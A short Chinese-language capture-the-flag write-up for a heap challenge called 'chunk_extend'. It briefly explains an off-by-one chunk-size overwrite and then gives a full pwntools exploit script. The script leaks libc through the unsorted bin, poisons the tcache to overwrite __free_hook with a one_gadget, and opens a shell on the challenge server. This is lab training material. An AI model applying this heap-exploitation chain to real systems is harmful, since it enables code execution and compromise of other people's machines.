漏洞点
add这里如果 index 0 ~ 9 都申请了的 chunk ,那么 i = 10 再退出 for 循环,但是还会接下去利用 ptr[10] = malloc(ptr[20]) 申请chunk,实现 index 0 的堆块溢出
也就是add 可以覆盖掉一个第一个 chunk 的 size
最后第11个chunk的size会变成非常大,编辑chunk0,就可以实现溢出
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./chunk_extend"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",30492)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
def add(size):
ru(b"choice: ")
sl(b"1")
ru(b"size:")
sl(str(size))
def free(idx):
ru(b"choice: ")
sl(b"2")
ru(b"idx:")
sl(str(idx))
def edit(idx,size,data):
ru(b"choice: ")
sl(b"3")
ru(b"idx:")
sl(str(idx))
ru(b"size:")
sl(str(size))
ru(b"content:")
s(data)
def show(idx):
ru(b"choice: ")
sl(b"4")
ru(b"idx:")
sl(str(idx))
add(0x10)
for i in range(1,11):
add(0x80)
edit(0,0x100,p64(0)*3+p64(0x481))
free(1)
edit(0,0x100,b"a"*0x20)
show(0)
ru(b"a"*0x20)
main_arena = uu64(r(6))
edit(0,0x100,p64(0)*3+p64(0x91))
add(0x80)
libc_base = main_arena-96-0x10-libc.sym['__malloc_hook']
free_hook = libc_base+libc.sym['__free_hook']
gadget = [0x10a38c,0x4f322,0x4f2c5]
one_gadget = libc_base+gadget[1]
print("libc_base------------->: ",hex(libc_base))
print("free_hook------------>: ",hex(free_hook))
free(2)
free(1)
edit(0,0x100,p64(0)*3+p64(0x91)+p64(free_hook))
add(0x80)
add(0x80)
edit(2,0x8,p64(one_gadget))
free(5)
itr()